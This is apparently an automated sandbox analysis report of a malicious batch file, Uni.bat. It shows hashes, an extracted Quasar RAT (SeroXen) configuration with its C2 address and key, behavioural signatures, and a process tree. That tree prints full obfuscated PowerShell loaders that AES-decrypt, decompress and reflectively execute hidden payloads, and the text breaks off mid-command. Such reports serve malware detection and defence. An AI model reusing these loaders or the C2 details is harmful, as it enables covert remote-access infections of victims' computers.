Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-11-2024 10:01

General

  • Target

    Uni.bat

  • Size

    13.7MB

  • MD5

    577c262de7ca8fdfef3b12e8dd170ca5

  • SHA1

    dd35b98c86bd9ac07ee362aeb99a83714511bd6d

  • SHA256

    5b50f8552e84e864a072b85c24a5aa8ceae9caf1f0ffec251e2240b43a26df2a

  • SHA512

    83c1033a62520ce5b32eadf68bfe48421986e5a15eedeb9dcfdf8ba1d1bb99ca863e5313ed6a3fd3a9fb433869e64094388376d6a141016bfd6035d9367ce2ab

  • SSDEEP

    49152:fYSZV75wgeIWwiXe0+DRcnymKneX5wmiiU5Xnh22OhqkNu7KTnyl3547ih563zBg:d

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.5.4 | SeroXen

C2

86.20.153.176:1007

Mutex

1e6be32f-7de8-4e84-abb4-edd31f5c9694

Attributes
  • encryption_key

    2C1A5E068ECB45220CA56F443A8C0F56408DD384

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    5

  • startup_key

    $sxr-seroxen

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 12 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 11 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e427e55e-db3b-45e0-a970-dae67332a6e6}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3936
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d41c35f3-63d7-4245-a09c-3516c578a7c9}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4704
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{808f74f0-b5a5-41ba-8198-1d1a6bb514e7}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4900
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6b9b4e50-f466-494f-9a70-a6ee2cd84949}
          2⤵
            PID:5996
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{617c83cb-5271-453c-8b02-0015685bb9ba}
            2⤵
              PID:1524
          • C:\Windows\system32\lsass.exe
            C:\Windows\system32\lsass.exe
            1⤵
              PID:668
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
              1⤵
                PID:956
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:508
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                  1⤵
                    PID:952
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1064
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                      1⤵
                        PID:1084
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                          PID:1176
                          • C:\Windows\system32\taskhostw.exe
                            taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                            2⤵
                              PID:2912
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                              PID:1208
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1244
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1316
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1380
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1388
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                      1⤵
                                        PID:1400
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1420
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2652
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1580
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1604
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1676
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                  1⤵
                                                    PID:1724
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1800
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      1⤵
                                                        PID:1808
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1936
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:2000
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:2012
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                              1⤵
                                                                PID:1756
                                                              • C:\Windows\System32\spoolsv.exe
                                                                C:\Windows\System32\spoolsv.exe
                                                                1⤵
                                                                  PID:2112
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2128
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:2224
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                    1⤵
                                                                      PID:2308
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2440
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                        1⤵
                                                                          PID:2448
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2664
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                            1⤵
                                                                            • Drops file in System32 directory
                                                                            PID:2696
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2732
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2788
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2796
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2804
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:2984
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:752
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3292
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3424
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2352
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              3⤵
                                                                                                PID:3124
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
                                                                                                "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function lXUcN($NcmdG){ $ZNBwE=[System.Security.Cryptography.Aes]::Create(); $ZNBwE.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZNBwE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZNBwE.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HNqitIpHrhFARvFSHzYiIMCV8zsJdtJ13c58RfpaiVk='); $ZNBwE.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e9o/NMh8sZbD8255zk7X7A=='); $aQXue=$ZNBwE.CreateDecryptor(); $return_var=$aQXue.TransformFinalBlock($NcmdG, 0, $NcmdG.Length); $aQXue.Dispose(); $ZNBwE.Dispose(); $return_var;}function AFlSx($NcmdG){ $mcaON=New-Object System.IO.MemoryStream(,$NcmdG); $KYaKt=New-Object System.IO.MemoryStream; $mzipE=New-Object System.IO.Compression.GZipStream($mcaON, [IO.Compression.CompressionMode]::Decompress); $mzipE.CopyTo($KYaKt); $mzipE.Dispose(); $mcaON.Dispose(); $KYaKt.Dispose(); $KYaKt.ToArray();}function dYVlV($NcmdG,$Nedin){ $hWSci=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$NcmdG); $jhjWM=$hWSci.EntryPoint; $jhjWM.Invoke($null, $Nedin);}$ADJIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($lvGEz in $ADJIG) { if ($lvGEz.StartsWith(':: ')) { $Ecxmz=$lvGEz.Substring(3); break; }}$eSebZ=[string[]]$Ecxmz.Split('\');$HLWdG=AFlSx (lXUcN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eSebZ[0])));$hvZbu=AFlSx (lXUcN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eSebZ[1])));dYVlV $hvZbu (,[string[]] (''));dYVlV $HLWdG (,[string[]] (''));
                                                                                                3⤵
                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                • Checks computer location settings
                                                                                                • Deletes itself
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Drops file in Windows directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2420
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                  4⤵
                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Drops file in System32 directory
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1520
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 